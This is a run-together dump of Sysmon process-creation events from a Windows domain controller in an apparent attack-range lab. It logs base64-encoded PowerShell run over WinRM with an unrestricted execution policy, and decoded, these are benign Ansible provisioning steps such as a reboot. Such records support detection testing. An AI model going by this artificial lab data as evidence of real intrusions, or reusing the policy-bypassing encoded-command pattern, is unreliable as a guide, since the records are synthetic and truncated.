-EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-3DCA-6078-60AF-100000000000}0x10af600HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{A8622C2F-3C5A-6078-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x8000000000000000687Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:12.731{A8622C2F-3DC8-6078-E302-00000000AD01}1344C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC8-6078-6390-100000000000}0x1090630HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DC8-6078-E202-00000000AD01}3548C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 154100x8000000000000000674Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:12.725{A8622C2F-3DC8-6078-E202-00000000AD01}3548C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC8-6078-6390-100000000000}0x1090630HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DC8-6078-E002-00000000AD01}4228C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 154100x8000000000000000655Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:12.657{A8622C2F-3DC8-6078-E002-00000000AD01}4228C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-3DC8-6078-6390-100000000000}0x1090630HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{A8622C2F-3C5A-6078-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x8000000000000000628Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:12.388{A8622C2F-3DC8-6078-DF02-00000000AD01}3968C:\Windows\System32\shutdown.exe10.0.14393.0 (rs1_release.160715-1616)Windows Shutdown and Annotation ToolMicrosoft® Windows® Operating SystemMicrosoft CorporationSHUTDOWN.EXE"C:\Windows\system32\shutdown.exe" /r /t 2 /c "Reboot initiated by Ansible"C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC7-6078-813F-100000000000}0x103f810HighMD5=547993395376742A437D3145AF6B0309,SHA256=F96073C3442EA0A99B4945394007602772DB36732D1511DC2068519526678F8A,IMPHASH=609F1D7580ED496A3076AEBA77DAFC7E{A8622C2F-3DC8-6078-DE02-00000000AD01}2448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UwBlAHQALQBTAHQAcgBpAGMAdABNAG8AZABlACAALQBWAGUAcgBzAGkAbwBuACAATABhAHQAZQBzAHQACgBzAGgAdQB0AGQAbwB3AG4AIAAvAHIAIAAvAHQAIAAyACAALwBjACAAIgBSAGUAYgBvAG8AdAAgAGkAbgBpAHQAaQBhAHQAZQBkACAAYgB5ACAAQQBuAHMAaQBiAGwAZQAiAAoASQBmACAAKAAtAG4AbwB0ACAAJAA/ACkAIAB7ACAASQBmACAAKABHAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEwAQQBTAFQARQBYAEkAVABDAE8ARABFACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAIAB7ACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUAIAB9ACAARQBsAHMAZQAgAHsAIABlAHgAaQB0ACAAMQAgAH0AIAB9AA== 154100x8000000000000000608Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:12.246{A8622C2F-3DC8-6078-DE02-00000000AD01}2448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UwBlAHQALQBTAHQAcgBpAGMAdABNAG8AZABlACAALQBWAGUAcgBzAGkAbwBuACAATABhAHQAZQBzAHQACgBzAGgAdQB0AGQAbwB3AG4AIAAvAHIAIAAvAHQAIAAyACAALwBjACAAIgBSAGUAYgBvAG8AdAAgAGkAbgBpAHQAaQBhAHQAZQBkACAAYgB5ACAAQQBuAHMAaQBiAGwAZQAiAAoASQBmACAAKAAtAG4AbwB0ACAAJAA/ACkAIAB7ACAASQBmACAAKABHAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAEwAQQBTAFQARQBYAEkAVABDAE8ARABFACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACkAIAB7ACAAZQB4AGkAdAAgACQATABBAFMAVABFAFgASQBUAEMATwBEAEUAIAB9ACAARQBsAHMAZQAgAHsAIABlAHgAaQB0ACAAMQAgAH0AIAB9AA==C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC7-6078-813F-100000000000}0x103f810HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DC8-6078-DD02-00000000AD01}4708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0A 154100x8000000000000000585Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:12.108{A8622C2F-3DC8-6078-DD02-00000000AD01}4708C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC7-6078-813F-100000000000}0x103f810HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DC8-6078-DC02-00000000AD01}4300C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0A 154100x8000000000000000572Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:12.102{A8622C2F-3DC8-6078-DC02-00000000AD01}4300C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC7-6078-813F-100000000000}0x103f810HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DC7-6078-D802-00000000AD01}2956C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 154100x8000000000000000531Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:11.639{A8622C2F-3DC7-6078-DB02-00000000AD01}1164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC7-6078-813F-100000000000}0x103f810HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DC7-6078-DA02-00000000AD01}4472C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 154100x8000000000000000518Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:11.633{A8622C2F-3DC7-6078-DA02-00000000AD01}4472C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC7-6078-813F-100000000000}0x103f810HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-3DC7-6078-D802-00000000AD01}2956C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 154100x8000000000000000499Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:11.564{A8622C2F-3DC7-6078-D802-00000000AD01}2956C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-3DC7-6078-813F-100000000000}0x103f810HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{A8622C2F-3C5A-6078-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 154100x8000000000000000461Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:10.876{A8622C2F-3DC6-6078-D702-00000000AD01}3600C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESFB30.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSCF2EE99019DAC4C81AE172E9818B04033.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC5-6078-1B04-100000000000}0x10041b0HighMD5=C877CBB966EA5939AA2A17B6A5160950,SHA256=1FE531EAC592B480AA4BD16052B909C3431434F17E7AE163D248355558CE43A6,IMPHASH=55D76ADE7FFEA0F41FF2B55505C2B362{A8622C2F-3DC6-6078-D602-00000000AD01}732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\cml1necr.cmdline" 154100x8000000000000000448Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:10.785{A8622C2F-3DC6-6078-D602-00000000AD01}732C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.8.3761.0 built by: NET48REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\cml1necr.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC5-6078-1B04-100000000000}0x10041b0HighMD5=23EE3D381CFE3B9F6229483E2CE2F9E1,SHA256=4240A12E0B246C9D69AF1F697488FE7DA1B497DF20F4A6F95135B4D5FE180A57,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D{A8622C2F-3DC6-6078-D402-00000000AD01}3740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlAC